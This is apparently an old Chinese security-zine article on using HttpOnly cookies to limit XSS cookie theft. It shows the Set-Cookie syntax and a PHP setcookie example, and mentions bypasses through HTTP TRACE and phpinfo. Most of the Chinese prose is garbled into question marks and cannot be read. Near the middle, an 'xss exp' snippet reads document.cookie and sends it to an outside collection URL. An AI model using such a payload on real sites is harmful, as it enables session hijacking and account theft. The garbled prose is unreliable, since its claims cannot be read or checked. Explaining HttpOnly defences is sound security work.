==Ph4nt0m Security Team==
Issue 0x01, Phile #0x06 of 0x06
|=---------------------------------------------------------------------------=|
|=-------------=[ ????httponly??????ó?????? ]=--------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=--------------------=[ By ???? ]=--------------------=|
|=--------------------=[ <jnchaha_at_163.com> ]=--------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
????www??????????????????ó????????B/S???????????????????????
?????????????web??????????????????????????????web???????www??????
????HttpЭ??????Http????????Э?飬?????????????????????????????????
???Cookie????Session????????????????????????????Cookie????Session?????
??????Cookie???????Session??????????????Cookie????????Token????????????
????????Token??????????????????????洢?????????????????????????
??????????????????Cookie???棬????????Cookie?????????????????????
???????????????????????飬???????Cookie??????????????????????Σ????
????????????web?????????????xss??????????????Σ???
??????ó?????????????????xss???????ζ????????????????????????????
js??????????ó?????????????????????????????????????ajax?????Щ???????
????????????????????????????????????????????????????????????????
????ó???????Щ????????web?????web2.0????????????????????????????????
?????????????????????????Bug???????????????????????????????????????
??????????????????????????????????????????ajax????????????????????js
??ú??????????????????????????????????????Ρ???????????xss??????
Cookie????Session???????Ч????????????ó????????????????Щ???????????
??????????????????????????????????
?????λ??Cookie????Session??????????????е?document?????У????????
Cookie?????????????js????????????Cookie?????????????????Cookie????????
????????????????????xss??????????£?
xss exp:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src="http://www.loveshell.net/c.php?c="+cookie+"&u="+url;
?Щ??ó???????????????????????????????????????????罫Cookie??
???????User-agent??????????????????Cookie?Ч???????????????????Ч???
??????????????Cookie???????????????????User-agent?????????????????
??????Cookie??Remote-addr?????????????IP?????????Щ???????IP?????????
???????????????????????????????????????飬????Ip????????£?????????????
??2??IP??????????????????????????á????????Cookie??????????????????У???
?Щweb 2.0??????????????ó????????????
??α???????????Cookie???????????????????????Cookie?????document??
???л???????????????Cookie???????document?в?????????????????????????
????????Cookie???????????????????HttpOnly?????????domain????????????????
?????HttpOnly??????????????????document?????о??????Cookie???????????????
????????κ???????Cookie?????????????з???????????ajax?????????ó?
??????????js???????Щ???Cookie????????Щ??е?Cookie???????HttpOnly????
???Щ???????ó???????js??????cookie????????????????????????Cookie??????
?????????á?????HttpOnly??????????
http://msdn2.microsoft.com/en-us/library/ms533046.aspx??
???????????Cookie??????£?
Set-Cookie: <name>=<value>[; <name>=<value>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]
??php???????php 5.2?汾????????Setcookie???????????HttpOnly?????????
<?php
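// Arguments: name, value, expire, path, domain, secure, httponly (the 7th argument exists since PHP 5.2)
setcookie("abc", "test", 0, "", "", false, true);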
?>
?????????abc???cookie???????????HttpOnly??document??????????Cookie?????
setcookie????????????header????????????????header??????HttpOnly??????????
document.cookie???????????????????Cookie????????????????????????????
Sessionid?????Щ?????????auth-cookie???????????????????????????Щ?????
???webmail???????????????????????????????????????????????????????
??????????????HttpOnly?????Cookie???
?????????????HttpOnly??????????????????????????xss????????????????
?Щ??????????????????????????????ajax?????????Щ????xss??proxy?????
????????????????????????????????xss??????????????С??????????????????
??????Щ???????????Щ??????????????????????Cookie???????????????á?
HttpOnly???????????Щ???????????Bypass????????????????????????????
??Cookie????????????????????Http Trace?????????????Header???Cookie??
???????????ajax????flash??????????????????????????????ajax??flash?л????
????????????????????????ó????????Bypass?????????????phpinfo????????
phpinfo????????????http?????????????о?????????????auth????????????澭
?????????????????????ajax?phpinfo??棬???header???????????????
Cookie????Щ??ó?????????????????header???й?????????????????basic??
??????????????????????
HttpOnly??IE 6?????Firefox???°汾???????????????????????Hotmail???
?ó??????й???????????????????????????Ч????
-EOF-